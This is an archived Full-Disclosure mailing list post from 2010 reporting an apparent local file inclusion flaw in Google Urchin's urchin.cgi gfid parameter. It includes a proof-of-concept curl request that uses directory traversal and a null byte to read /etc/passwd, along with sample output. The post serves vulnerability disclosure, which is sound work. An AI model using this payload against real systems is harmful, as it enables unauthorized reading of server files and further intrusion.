[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTinQ16Ne_6DEDshUpi8cZA-VgEo8JK=19D=BX4fU@mail.gmail.com>
Date: Tue, 14 Dec 2010 03:34:30 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Google Urchin LFI (Local File Include)
vulnerability
While fuzzing an Urchin web application, I discovered what appears to
be an LFI vulnerability. Neither Secunia nor Google / Urchin appear
to have reported this as a known issue. The problem lies in the gfid
parameter passed to urchin.cgi. This was tested on a somewhat
modified version of Urchin 5.7.03, but it appears that the gfid param
can be influenced given the results. I don't have the ability to test
further, but this appears valid and unpublished. Can anyone confirm
they see similar behavior in the same version or other versions?
PoC:
"""
$ curl -s -b '...cookie_data...'
'https://host/path/urchin.cgi?profile=...&rid=13&cmd=svg&gfid=/../../../../../../../../../../../etc/passwd%00.html&ie5=.svg'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...
"""
--
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists